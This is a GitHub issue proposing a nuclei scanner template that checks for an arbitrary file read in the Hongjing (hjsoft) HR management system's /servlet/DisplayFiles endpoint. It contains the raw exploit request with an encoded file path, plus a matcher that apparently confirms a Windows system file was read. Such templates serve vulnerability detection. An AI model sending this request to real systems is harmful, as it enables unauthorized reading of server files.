### ISSUE TITLE
add hjsoft poc hjsoft-servlet-DisplayFiles-fileread

### ISSUE THREAD

**Issue by Tripse** [Co5mos/nuclei-tps#6]
```yaml
id: hjsoft-servlet-DisplayFiles-fileread

info:
  name: hjsoft-servlet-DisplayFiles-fileread
  author: leadlife
  severity: high
  description: 宏景人力资源信息管理系统 /servlet/DisplayFiles 路径存在任意文件读取
  reference:
    - https://
  tags: hjsoft,fileread

http:
  - raw:
      - |-
        GET /servlet/DisplayFiles?filename=11&filepath=LsNVAA8YXnv9U7EgvPAATTP2HJBPAATTPC2XDolqkE51gLe HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(body_1,'for 16-bit app support')

```
